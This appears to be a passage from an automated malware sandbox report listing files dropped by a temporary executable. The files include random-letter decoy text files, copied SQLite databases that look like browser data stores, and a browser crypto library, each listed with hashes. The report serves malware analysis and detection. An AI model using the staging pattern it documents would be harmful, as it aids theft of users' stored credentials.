Preview:	DTBZGIOOSOGIXCBMGZZTWMBQXGHIBDIDBNCACFDFVBOXTDUUJMUMBAKZSHFEIWNQHEECYVTVTSOTORNQIPIDARMCQDPQAFMDPEUWMOYTBCDCAYVFJLXBCNSKBDWMSQYEQYRUTREAZDRNQIZYXPRJXUJXDYZYLJWOVPCEZSCSUSREYDMTRVOKIKSVPBPVQFMFFQNUDCCBDNGIIDGYMQHFPEMCFEOSEKVDEHVQZBXIBJURBZFVTYETURFSVIYLBMHJKBCAPGOAJJFKOTEXRMHREBNTBJGLLRAKZHXKTTSKEXODMEVVGUJOGNLYLFYGHQIBHAFRVYETMDPLEXBQXLVWYLIMFCJAKPFWSQSVSWYINAAOPMCAAVTIWDFRPKUBYLVKYRNUDCLWZJHLKSXWPDEXGEVUQVEJQWTUUYNTOIRLKQTXRWJHCSMGZWWPGPBFZQLOSDMHAPKSMVNNMIVJAORPRFUXPDROELZMLHAIBRVVWUMSDWFAHIBDVMGGFRISFYQZZSESXHMSUQCQPXBCPTAZBJXKKLRBWEZYGWRXBBTYWRRUXCBJIWCOYQKBQCGCZCPFVLGETTTZLEFZDQMQFHJVERUYLQUPVYRNXQJRLPUBWWQHPTYNORTRKKOMLWKAQZNHZQUJGTIYVIKGAWLHSALTZENHAAJKNKUBSQXDVFQRUFJLDFZAQUPCRNDOOEIALNCMGYLCEZSLPOPYEKIEYDRXSDONBFKQKQMAWBJULDADUHXOQGQLIDEPZRHMCBVTLCJUGOZRYCGXCXPEOJTGJORAEJKASXKARQEVOHMITSWHQEWOJXNOGSKWUQQTSOSWSCCMOUDMMHPYKEAJECJSGTBNPSFVWSGFBKGSKEHVLWONOMPOOJEJHDMKGRPCSBYWCZNHTWZCKQNEGEYABJZETYLVHROKZJAIGKJDHLJBRYOVDHNANLCJBHTDDRPXIXDIHNWDDQDHPSAKZRRXOFYYXZWQWZFESELWVMUIBHMCLVZP

C:\ProgramData\DVWHKMNFNN.docx

Download File

Process:	C:\Users\user\AppData\Local\Temp\nsi4BEF.tmp.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.694985340190863
Encrypted:	false
SSDEEP:
MD5:	C9386BC43BF8FA274422EB8AC6BAE1A9
SHA1:	2CBDE59ADA19F0389A4C482667EC370D68F51049
SHA-256:	F0CC9B94627F910F2A6307D911B1DDD7D1DB69BAD6068EF3331549F3A0877446
SHA-512:	7AACA07E8A4B34E0F75B16B6F30686AC3FB2D5CBDAD92E5934819F969BAFF59385FB8F997334313EA5938FD955D6175C4548D6B1F915D652D9D9201C9418EF83
Malicious:	false
Reputation:	unknown
Preview:	DVWHKMNFNNSXRPFRFSVVCQPXSKWHKPJJHYQWYYFONAJQSCOHZADBHUOWOSPDVAOIQVOBHGMIENZQZLABYDKWXGSUQNSEINIQSVMZZWTJLYMGYBQHIJSUWZKJPGBZUGFOXNAMLQTVGWDCYDMNHGVRTUWNHIWXJNQONTAXVVVCFDLWYDVWNMKHRFTZAVEQPXZHSEXPEHWUHPJZDMDXPYEJBYWZOQETVPLRKQRCYTAXMNRBOUJSCYZOUPOBJUWFDMUYFBXCBLZHFHONIURELJQVLWAJRIQCHHASBUAREPSIMJIZDUKJCHMMSSWSEDFHFQOUVYZORWJIUACXUVQKUMLXTQIKDBVNZOHJYYECOBYPNRILKERBHKZPVUSQLHAQRTPWCRMZADYONIIOVUWOBVHAUGZVAGTZTZBMHSOOQORENTXCJFMVWMGLOOXBDWANXXJQQTBDTWOSPFMFVQKLNTSHOPQMHYRYZMWDXVFGWFOSCSFMKCDDHTOQHBTQAFQTXPUHHEAKYRCQIODCCSHRSAJQEFRHCQLQVVMUHWOHHQJPSHCNKRLIRESUXLZIYSWDHHYZVRKLAGFLVTEJQHEEMVUUEQKQMTBDXFGSROZTNPLCVTEEZGUUCQUEKNMQFATATJRARXQQMZYEVACDAXILYPEHYTJOQWSFAJEGHIDIXMKDXPATNSATPECIMRBZNBXXVMGPLMVEKCUOXJWFGQSTWPMTEMRCYGXECVTNKYROYRYTPRDPCFGGKUUBXXSDFZEJCQRIRFLCNMPMLIGUCYPHMWYVAIPAAPHTQAYFSJWLSCZICIXZHXNKAKRHJVENGZTUTVWSNYDDYMWQHHAITLUZXNORBLYTBVCEBWBMSVZXNZMKYFPRFPLFCUSJUWNKQJIZRVZASPVFSUSBYQZZWKEORBDDRCYRBTIMTLHDTZRQUKYJIWHXVJYPEZSDLWZVPZGEYQPCSGGVJXXBUCNBXKQPZTMTVPZUETYYLRJEDWIHAZMS

C:\ProgramData\EBAAAFBGDBKKEBGCFCBF

Download File

Process:	C:\Users\user\AppData\Local\Temp\nsi4BEF.tmp.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
Category:	dropped
Size (bytes):	40960
Entropy (8bit):	0.8553638852307782
Encrypted:	false
SSDEEP:
MD5:	28222628A3465C5F0D4B28F70F97F482
SHA1:	1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
SHA-256:	93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
SHA-512:	C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
Malicious:	false
Reputation:	unknown
Preview:	SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\EBGIDGCAFCBKECAAKJJKJEHDGC

Download File

Process:	C:\Users\user\AppData\Local\Temp\nsi4BEF.tmp.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, file counter 11, database pages 7, cookie 0x3, schema 4, UTF-8, version-valid-for 11
Category:	dropped
Size (bytes):	28672
Entropy (8bit):	2.5793180405395284
Encrypted:	false
SSDEEP:
MD5:	41EA9A4112F057AE6BA17E2838AEAC26
SHA1:	F2B389103BFD1A1A050C4857A995B09FEAFE8903
SHA-256:	CE84656EAEFC842355D668E7141F84383D3A0C819AE01B26A04F9021EF0AC9DB
SHA-512:	29E848AD16D458F81D8C4F4E288094B4CFC103AD99B4511ED1A4846542F9128736A87AAC5F4BFFBEFE7DF99A05EB230911EDCE99FEE3877DEC130C2781962103
Malicious:	false
Reputation:	unknown
Preview:	SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\HIJEGDBG

Download File

Process:	C:\Users\user\AppData\Local\Temp\nsi4BEF.tmp.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
Category:	dropped
Size (bytes):	106496
Entropy (8bit):	1.1358696453229276
Encrypted:	false
SSDEEP:
MD5:	28591AA4E12D1C4FC761BE7C0A468622
SHA1:	BC4968A84C19377D05A8BB3F208FBFAC49F4820B
SHA-256:	51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
SHA-512:	5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
Malicious:	false
Reputation:	unknown
Preview:	SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\HTAGVDFUIE.xlsx

Download File

Process:	C:\Users\user\AppData\Local\Temp\nsi4BEF.tmp.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.692693183518806
Encrypted:	false
SSDEEP:
MD5:	78F042E25B7FAF970F75DFAA81955268
SHA1:	F7C4C8DDF51B3C5293E0A92F6767D308BBF568B4
SHA-256:	E4C9709AFEA9D9830CED1AA6DF1711D0332A5972688640368DDC32C07C0D5D17
SHA-512:	CE2548833F62C549CA0268BE445E517AC986CA44EA52916A153DFFE4D7FA59B703E5927DFE70836E8B082C246793DF2066D72DB4A6E1C948940E88C524952348
Malicious:	false
Reputation:	unknown
Preview:	HTAGVDFUIELGZFCTZZGRSQISCXMOKSCAZEJVAPBPJKABIZKEGFAGMGOIUPHPJOYIWMVIKWCNUOWDMGCFXJQANMMOULIVTQQGUZVVOLZWBYTHYOHMMVIMTTBBCAIGONNRVEUMTCTCEMTWFNDSQPHEPLAFZAKYSROZKRQDUZOUZIKJGJRIBJODHOULJHWQBIJSAIYMXLFOSFOEFKTQPEEWFTFCIFSLHXSXYXBWTPCWMCGPETOSVLNKYCONFWCIUFEQKOWQNQKJSIZKNZXOQWMTJOGWDBUFBKDXUPYYIXUTOPSOVWLVKIOKFPSXDAVMBUZIYYZUQTDLZIMRRGXLTOEJMFWLOMNPNLICPZPKTHPXELGBYTJLOJOEWNRDNMXXRYMAJBWCTNMBREIJDVVIXEHEGYQKZQCGLVHOCMUSKXCQQMURLYKWUIUMFSGYMZUQXCTZOKQYXJAUDEVTSOOQUKZKKEEOANGSIIWTUVEGHTCOTXCDTCZIFUAWDLWKDNQTUAXBCRBKEGHCEPWTXOQVBWKIXLQEUCHHRHMKWOVVBFOLNUHSLLMHOOFDQCOVQVCNKKYOGNPYFHMPHXNPOTANYIGKSXGYDKBAEAYCNSDEQRTDZXKUOIUOHOMJPCCDXHJTXLKPCLAKLUNDAFZVUXKBSBAWUIBEQFANHTKLDXHBVLMBIXZUPHFUIHTECGPPEITWIRPTQHJDDRMAQERQMDOELBOQSEMMMCCUPQVDZXOFFYQSEIDXDPFNKRGYVUDDHHQGPRFUFAJOKTJSGMHWRXPZFPTHUACEOFEZUYOSJGJLFUTHTDWBPUETPFOWWTNVGDPCHGGCYSORPYRNRZVFDIQZLGVXSZLKMPDVKQURMLSZDDXVNBPXKBLQIKBTAWLYTZWTFUNWLSZPWUWBVBXUJMBCFHPMBIRGLQAWDQTJEHKOGMUTEILXROVHXNUORTTYMCMDGNZYCCCTIABCKYPUCGPPUUSBWLIPYZKIMRHFVZCGDPKZ

C:\ProgramData\IDAEHCFH

Download File

Process:	C:\Users\user\AppData\Local\Temp\nsi4BEF.tmp.exe
File Type:	SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
Category:	dropped
Size (bytes):	114688
Entropy (8bit):	0.9746603542602881
Encrypted:	false
SSDEEP:
MD5:	780853CDDEAEE8DE70F28A4B255A600B
SHA1:	AD7A5DA33F7AD12946153C497E990720B09005ED
SHA-256:	1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
SHA-512:	E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
Malicious:	false
Reputation:	unknown
Preview:	SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\JDAEHJJECAEGCAAAAEGIEBKEBK

Download File

Process:	C:\Users\user\AppData\Local\Temp\nsi4BEF.tmp.exe
File Type:	SQLite 3.x database, user version 12, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 3, database pages 3, cookie 0x1, schema 4, UTF-8, version-valid-for 3
Category:	dropped
Size (bytes):	98304
Entropy (8bit):	0.08235737944063153
Encrypted:	false
SSDEEP:
MD5:	369B6DD66F1CAD49D0952C40FEB9AD41
SHA1:	D05B2DE29433FB113EC4C558FF33087ED7481DD4
SHA-256:	14150D582B5321D91BDE0841066312AB3E6673CA51C982922BC293B82527220D
SHA-512:	771054845B27274054B6C73776204C235C46E0C742ECF3E2D9B650772BA5D259C8867B2FA92C3A9413D3E1AD35589D8431AC683DF84A53E13CDE361789045928
Malicious:	false
Reputation:	unknown
Preview:	SQLite format 3......@ ..........................................................................j......}..}...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\KJJJDHDGDAAKECAKJDAEGCBKEH

Download File

Process:	C:\Users\user\AppData\Local\Temp\nsi4BEF.tmp.exe
File Type:	SQLite 3.x database, user version 75, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 2, database pages 46, cookie 0x26, schema 4, UTF-8, version-valid-for 2
Category:	dropped
Size (bytes):	5242880
Entropy (8bit):	0.037963276276857943
Encrypted:	false
SSDEEP:
MD5:	C0FDF21AE11A6D1FA1201D502614B622
SHA1:	11724034A1CC915B061316A96E79E9DA6A00ADE8
SHA-256:	FD4EB46C81D27A9B3669C0D249DF5CE2B49E5F37B42F917CA38AB8831121ADAC
SHA-512:	A6147C196B033725018C7F28C1E75E20C2113A0C6D8172F5EABCB8FF334EA6CE10B758FFD1D22D50B4DB5A0A21BCC15294AC44E94D973F7A3EB9F8558F31769B
Malicious:	false
Reputation:	unknown
Preview:	SQLite format 3......@ ...................&...................K..................................j.....-a>.~...\|0{dz.z.z"y.y3x.xKw.v.u.uGt.t;sAs.q.p.q.p{o.ohn.nem.n,m9l.k.lPj.j.h.h.g.d.c.c6b.b.a.a>..................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\MXPXCVPDVN.docx

Download File

Process:	C:\Users\user\AppData\Local\Temp\nsi4BEF.tmp.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.698669844484375
Encrypted:	false
SSDEEP:
MD5:	4FCF725C73B93BE52C2E1CD48AC3A562
SHA1:	98118BDED7CC2397C19310A914C6CA6B39CC47DE
SHA-256:	3803B68C31F1D6091C8D35F7B737B363C99ABED15B65899869E2A5AFA443D2C4
SHA-512:	8EDB10C8C81284109073EAABDB337F2AF5428AC5A50DE4999B61792D434D099124DF2DB5B2F58E9FC6335EA2E6F474291F8726DEF293A409418CDE6E0D5D7CFC
Malicious:	false
Reputation:	unknown
Preview:	MXPXCVPDVNZDMRYXKAXPKZSKXQENMVJGASOKSKKVKMVTFWCKJVQUEHFJLYGAGVTAPSEFWLYDESGESNCQQMFQIJOIYCFNJODSXZOERROXNDWXBZRWZFOKQBPLORLXBDLECIGMCKVUGLWKNMZJBHPGARIQDCSYHCPUKBGABSYSPDCWIMLINBEYVYXKDRVQIRPITEAVGQTKEJGNRGJGNMXLAZZZEOVLCHVHUAHQLECFOLMZPDMGFZOZZRCUGUGQXZRQEEYVPMGAXSRCPXPOCBVPESPOAHTWHHDKCHMXTJCJJDRFYUOIUWGYDNCJXDYQFYCADMQIYTSLSIQVEMFCENTOHNQNWXMKIUOZDFCOFDXWRGCINHQCHYKQMLGTDJSTFEPKLURPPUWEFYLYEFPSNQGBKUZJQDAVMAFGFXHFNGMNUPXAYGABBOYSAPGCMGQZYDGMRINVJWRFASDKOFXOQBOCWTMIFSMCIGFJLECWNXSPKYYMZPZTTKDCIUUBZTJKBGNEDOBUUIKPGSXPUUDSIAYBARDMCGXUVFSTYNWEUHFOSOADWNJSVGVNYVPTFIEGPCWGLEJGVLKBVQHFEPYYRMGWPMKQWLBOAFFRZQRDMFIHCLMXYKGCSNXZKWIKKIILSRZRKNKBMQKPDNBOSZDCMCNAMVOVGTUYRVJHPAMTCIPJHQZLFPQNHPQQTDAETXQMKGTZQPDKQISDDHIQFGGWJPCMAAAGGRYLKNAQHJDFVXQSDDSPCOTQDHQLRMFKVLQAFIBPIEJVVBHAMXWNJDJUFWZAUYOGKLIJAKPXHFCOGJJVGZXSWYIBAKNZMMSVHMHLNHNJCCWYZMEJWSAERLVHQEHUTACSGGGRMLAWNQTJDBBGLANCZUNRXUOYFLZHFFWFLDWPBOZWIRWKAIWLBOQNNKCSLPLMPBIDNPIJQEDKYXMBPUFPZCWHQURUYJBENNRMTLHPICTOSJUUPWITJRCCXDXEHQQYLVPFNZKWXNGEGYNB

C:\ProgramData\ONBQCLYSPU.docx

Download File

Process:	C:\Users\user\AppData\Local\Temp\nsi4BEF.tmp.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.699434772658264
Encrypted:	false
SSDEEP:
MD5:	02D3A9BE2018CD12945C5969F383EF4A
SHA1:	085F3165672114B2B8E9F73C629ADABBF99F178D
SHA-256:	6088E17DB4C586F5011BC5E16E8BF2E79C496EB6DAE177FF64D9713D39D500CA
SHA-512:	A126D98EE751D0FB768E4DB7D92CBC6AE7852FEE337B85ED045D871DB321C6C98FD58A244D058CA3F41348216C68CB4A37FA854980BB16D358AA62A932DD867E
Malicious:	false
Reputation:	unknown
Preview:	ONBQCLYSPUBDAQCIGYNWXHPENQNLJZGXCHXSNXZNCZBUHYDXPEMCJPAWYQSVHMGKHJUFFFYDAXDAHOLOAZEPTWZTWDGPFLXMMCXLCIIJOXMVRNMUMTICVHQSWNAGIYCQBOZZHONWWBXKDUJYBRPSLNFGTUIFTNGJEATOXKHEFMERAQZVBMQGKZUKXDBMGRJDOOGATZZKQMEZJRWZVAZRPQTVWPETCIMLPMYNWZLVLXRPUUKLNIMTYDNYIJTZEFJDNMWTOFFKRRINCRDCFGJAJNMYQHGXGVHVYPEUFBNUIGUVGBYQKIAJLIVACVIHEGZIYKSROURNGZSCTUKBKFFCGPXAONPDEBIZJRKCFYHATDXLXYKGLWXBCHJERCRNMKESIMBDNPMPBWXSVSEAAUEKEGUIJBZLAESAFZHMBLPPKMNTZAZIIYSHMWJBFTZZSKYNFJYSBRLGVHOWZUQHXUSSJESIEKHZLTLILMSMJZHXFWGJQNWQCDLXEWBZPGBTVDVCPPUFLFGNZRUKJOANJVXVTXLOQLFUIVEWTCBKOBYZMAOTIMQMJYRYLSOLSSACCLCFTVXCKKJDNWQAETNXHIOQCDTXLLVEQLNLGDIOULNFNNDXTVYYSPDWWZHDSYHBRXMUAAHJIGSGLSFKCGADPUAASYZFEZWHYDLQDUCHJXMNMTNCDCMNIJQCSGEQOGVGYBYPMTZBBFOACZMMKVFNELOMGSTCQUDRFKLFGOHOTZKZCWJWDRECGYETFYOWLYECGICMGUKZRVNHUQTLQLHUTPRZXBVYMPAFBLSWKSSKBGWCWBFEEZIAZUZGEYMYBSXYUCHEALFJRSGWQJMABNQHSZANDDTYMVJKXFFFDEENZAGRGVLHFELVOSGTXVOOPFGCQDSFWOYKKOYUHFWMXWPLHFIIPORMEJNOFYMJRBAZLYTIOKEFIWPDZUKMIWKLZXBOESUCXZXQSCMQKDKFBCHJMPMZHELLNSYYEJNBRRXVBMPD

C:\ProgramData\ONBQCLYSPU.xlsx

Download File

Process:	C:\Users\user\AppData\Local\Temp\nsi4BEF.tmp.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.699434772658264
Encrypted:	false
SSDEEP:
MD5:	02D3A9BE2018CD12945C5969F383EF4A
SHA1:	085F3165672114B2B8E9F73C629ADABBF99F178D
SHA-256:	6088E17DB4C586F5011BC5E16E8BF2E79C496EB6DAE177FF64D9713D39D500CA
SHA-512:	A126D98EE751D0FB768E4DB7D92CBC6AE7852FEE337B85ED045D871DB321C6C98FD58A244D058CA3F41348216C68CB4A37FA854980BB16D358AA62A932DD867E
Malicious:	false
Reputation:	unknown
Preview:	ONBQCLYSPUBDAQCIGYNWXHPENQNLJZGXCHXSNXZNCZBUHYDXPEMCJPAWYQSVHMGKHJUFFFYDAXDAHOLOAZEPTWZTWDGPFLXMMCXLCIIJOXMVRNMUMTICVHQSWNAGIYCQBOZZHONWWBXKDUJYBRPSLNFGTUIFTNGJEATOXKHEFMERAQZVBMQGKZUKXDBMGRJDOOGATZZKQMEZJRWZVAZRPQTVWPETCIMLPMYNWZLVLXRPUUKLNIMTYDNYIJTZEFJDNMWTOFFKRRINCRDCFGJAJNMYQHGXGVHVYPEUFBNUIGUVGBYQKIAJLIVACVIHEGZIYKSROURNGZSCTUKBKFFCGPXAONPDEBIZJRKCFYHATDXLXYKGLWXBCHJERCRNMKESIMBDNPMPBWXSVSEAAUEKEGUIJBZLAESAFZHMBLPPKMNTZAZIIYSHMWJBFTZZSKYNFJYSBRLGVHOWZUQHXUSSJESIEKHZLTLILMSMJZHXFWGJQNWQCDLXEWBZPGBTVDVCPPUFLFGNZRUKJOANJVXVTXLOQLFUIVEWTCBKOBYZMAOTIMQMJYRYLSOLSSACCLCFTVXCKKJDNWQAETNXHIOQCDTXLLVEQLNLGDIOULNFNNDXTVYYSPDWWZHDSYHBRXMUAAHJIGSGLSFKCGADPUAASYZFEZWHYDLQDUCHJXMNMTNCDCMNIJQCSGEQOGVGYBYPMTZBBFOACZMMKVFNELOMGSTCQUDRFKLFGOHOTZKZCWJWDRECGYETFYOWLYECGICMGUKZRVNHUQTLQLHUTPRZXBVYMPAFBLSWKSSKBGWCWBFEEZIAZUZGEYMYBSXYUCHEALFJRSGWQJMABNQHSZANDDTYMVJKXFFFDEENZAGRGVLHFELVOSGTXVOOPFGCQDSFWOYKKOYUHFWMXWPLHFIIPORMEJNOFYMJRBAZLYTIOKEFIWPDZUKMIWKLZXBOESUCXZXQSCMQKDKFBCHJMPMZHELLNSYYEJNBRRXVBMPD

C:\ProgramData\PWCCAWLGRE.xlsx

Download File

Process:	C:\Users\user\AppData\Local\Temp\nsi4BEF.tmp.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.6969712158039245
Encrypted:	false
SSDEEP:
MD5:	31CD00400A977C512B9F1AF51F2A5F90
SHA1:	3A6B9ED88BD73091D5685A51CB4C8870315C4A81
SHA-256:	E01ADE9C56AF2361A5ADC05ADE2F5727DF1B80311A0FDC6F15B2E0FFFACC9067
SHA-512:	0521ED245FA8F46DE9502CD53F5A50B01B4E83983CC6D9DE0CF02E54D2825C1C26A748CC27E24633DA1171CE0309323235ECF7EB536D4058214D7618794CF2FA
Malicious:	false
Reputation:	unknown
Preview:	PWCCAWLGRESZQJYMKOMIHTZVFVPFCSAZVTKGMPWIGSDMTLFZQLHJERDPYZCJGFCRLISWNBAMIMDXCWDVGVLWLRBEVYOOPHYWACKPZXSURGSIFWTFUJKLSAQNAJEWDLUIKFHXLUAMUDGRAVFMICAHEZBIIEGWGAVVJHMHSIBGNLEHYVSOKQMYABDYCPEBOGBMYUCIGVRGYYQRAYNYHAIBMHOTRIZLLYBECMXTCFUOVXXHSEMIUWSBDHOZIZZUXFTLKXXNEMXBKLCQDPKVZNOMDYUYJRWCVILZVJDNNBMPTNOFSKRQTILJRXTKDNUIYSQCAOPCQKTXYXPPGZDZOQYLGYFPFIWNBSQZXYABPTNBJQNBZEETJSFXZNHXBRWUHOMCZAGZQJLNPMZFALBBPHBIXZHLBTBJLTUHPUYVUDWDFJANSIIDJVMUYLPZPYGAJWMTOHGILQWHKJDQUWMTSWIBVVZGAHCNWIFZNGNERRKMSIVXWXEXRZZEWYASCIYJYCOOBWRTNZELPWKFVZKZIBGQBLGCTSTNAJSWPHYJCQSYZVFRYFSRAVVXJIOHQCNVEOIMWPEAVCJLBHRUKDHJWPFMXAKTZVQCOUKYCBZFWBREKKHOHZVNMMJZGWIZEYRAIKTHMJRCWVWKNMJNSZHSDRUZSQOJKCTOSNGKOKEAWUIQNIYHWKIIDHKQIJWCSGRRLEVUTENXSNNVDVYDJTIWYNCAZIEBXMIROLIBTLMGEUOCECFFWLENTJSVHFKQHKAPBXQAJJSUOUSFCBQTHCFYZGSVVAUPLQELRWLXRCZSUSFUBCORCWMJPUNHTEEYODSFGJFTDZLLXMQYMIHIZXOYGABIAWYSBWLAJSCKBWGJBVMMJKBKLUHULJIUHQXIXESAUTNVVZNKMIVIOHPPQAWTQSEHTQMIWNPRZRETXZHRGWOTGIEHCCSGIUCKCIFCQPTAJOFCIMYSMCOPGASEEYCNQLXCNRAPQUSQXTWPKPYCQXPE

C:\ProgramData\UMMBDNEQBN.xlsx

Download File

Process:	C:\Users\user\AppData\Local\Temp\nsi4BEF.tmp.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.695685570184741
Encrypted:	false
SSDEEP:
MD5:	A28F7445BB3D064C83EB9DBC98091F76
SHA1:	D4E174D2D26333FCB66D3FD84E3D0F67AF41D182
SHA-256:	10A802E683A2C669BB581DE0A192C8291DD2D53D89A2883A59CC29EB14453B93
SHA-512:	42526FEC4220E50DB60BD7D83A07DEB9D5BE4F63AD093B518E9ECC86B779210B0170F6F64C9F16064D50CB12F03643BAC9995D4F3C0AFD5F8D38428D57ADE487
Malicious:	false
Reputation:	unknown
Preview:	UMMBDNEQBNVIMBNGHYZCBKXWMQJKYISTANSRNFXXBKALIIEMEWAFQEPTEMZCIXXNMQBGOXWSDYSAWKIYPJITNREMVRXPPJZFUTMGRRRGTCHVLEWVUJGZEUQVONQVACEFWZUCIAFXPFGXIUOOBZEEMGMWJQIEKKICYJJWAFUKYZAJEGUQKGDPRPXCOWIPBRUGHWDFZLGSKZVCHVVPGLEFNGIVLBVNAOVXAPGATADJBIQTBNJGWXRSEYKCSVZOSTCBHYFHUDEWNGEIFCVREPZDZDZRITFEVFCQQWJYZXPUKJWHTWGWASTKDCAVEWZOIGFZHRWCJBVRLDWGVKPABCQUOHQIMLUFUGYGMPGPEMSRPPSGWIGRVPBGZIWLNEVYFFJBCMBSXVABNRNXULCTUAANAXDHKZOGVCNQZHMRBENWTTLQVVMDLNBEWHLPZHMPDGRLJWAQJDJRCWTFWIOLAURRCSMFJOCFDKUGPLTPABARXKPCRXOIHHVRWXAKGHOTYLCEQQYYDKVZQSYLCAEGGBQMMJGSNJWBTJXSVALINNRLURMPNGFXHJRVJIKQJSDLNIOXGIGDFDCOTGGXMDLTDYSIKCMPVINDDXXQCEQCRUBLFEWMYMSEGUHIKIGUYOMOXSKOTVNUNGWUFYKYRNZXOOTSRYXLZHRZXNEDJUNPYGNIIZSPVQBOLBRRRWGDMQWUTRSZWBYMXNMLKLFNZWJVDDPMJOXTVBMYRXNQFGBLURKFIUAHJBFFXNWQDYRLZADYGMETNXEOXLOJKYQPEYHUVTFGXQTGPQBWZQTVFXZFUVQERQZJCYYPFBYONAVFDOLTNRGWQYGSYWCWUWRETJZGVJMEFQTYPOLONVZFREVORMBQJOCLOALCJHHCHQSHKLUNBIRHRBSQSMERLKKFTGHUQKRPFIIELZZVXZVNHCIQYYXNMJNSOZOIRGGJKUWXNCWSNCFMGQIQVNKVIGRCLSDWQPEDLSLTGBRXRTMGFWYQSCLN

C:\ProgramData\XZXHAVGRAG.docx

Download File

Process:	C:\Users\user\AppData\Local\Temp\nsi4BEF.tmp.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.69156792375111
Encrypted:	false
SSDEEP:
MD5:	A4E170A8033E4DAE501B5FD3D8AC2B74
SHA1:	589F92029C10058A7B281AA9F2BBFA8C822B5767
SHA-256:	E3F62A514D12A3F7D0EB2FF2DA31113A72063AE2E96F816E9AD4185FF8B15C91
SHA-512:	FB96A5E674AE29C3AC9FC495E9C75B103AE4477E2CA370235ED8EA831212AC9CB1543CB3C3F61FD00C8B380836FE1CA679F40739D01C5DDE782C7297C31F4F3A
Malicious:	false
Reputation:	unknown
Preview:	XZXHAVGRAGWUZPDZUEGAYKLOJAATOVXJVRJCLWZVJFOFPZNHYWDUACWAEZMWROZFSNVNLUZTIGQHRPFNIXZWAQNKEFFVMFVJEYHESHQWKICFNAONPPGGSABXPCYNBZITQCMUVOCKUUGGEKLAFNXLBOWPVKEOIBLWWAPOYVIECYONJSQKQQDXGYONJXNAQTSMYDMXZYXYEGULUXOLZALCFDXCFNFKPZDKANUFUXWMRLBIQALSWLXEXAFGLOYIFRMFQEZVUTIKXYTPJYCVKCQFZXEECZIXEIHQZQQYTVHKAQLEKMWMZZULQXNCKIJZACKDTKVLWIVBKFQXXOMIGVNYLPAXZFSMAZJTXJUXMZPVKWUQVNXGFUJUQLXWUJWXXGWFDEHIUZKLUQKWAGSXVVNNFXCYWQGRDZCZRLRYXTMLQRGEHRFDGZJOZZKKYLKBWQOZXHGQWMYFROUTIBGKPARBJPOEDNOQMKUEALEVNBPCUIKVTPAWCUIHGVFJWDYFDWTASWSIDDELYILSJEFAACQCZMSARBUAQIRFFLJJMHBVZYFUUTOLDYGUUVIYGJYNXGWJCYUYVJKCVNACSGWHTSOCDOFFPNNHQEMEAXXRINULLPFMNSQUWWIGEJQABGOQLKIXTZYHHQQTOZYLTNJMMWELZZPDIDHXRBCJGZUDMDGVMAEUIWFYWGIHBTOBLWXIEGHJRIDDBTOXKXOOIAAJUPCJRNMROGCUNSCGQYEEZLWOYIYMJPGKLDXEOGUAUHNUJCEFMGEKRBWDAHWRXWVSFQCURHTSGJQWPJHWEAHXCEQVKJRECGPJBGCDBEGBIRMVXHGYHMWJXIXMQHTKSZFVSATJKNAJOYAJNKDTKZMBHRENBCAYUBASQOTKKVNCTZIOGOUVVDNXYVJFHXTPSZMOWWCPPMBMLCTTPGONDVJOVLCMTWRESLSDGLNGAGTIXVYAJZVBYYHWAMERRRQXMWVCYELNGPYXOGOPHWVXCTQIKXSK

C:\ProgramData\freebl3.dll

Download File

Process:	C:\Users\user\AppData\Local\Temp\nsi4BEF.tmp.exe
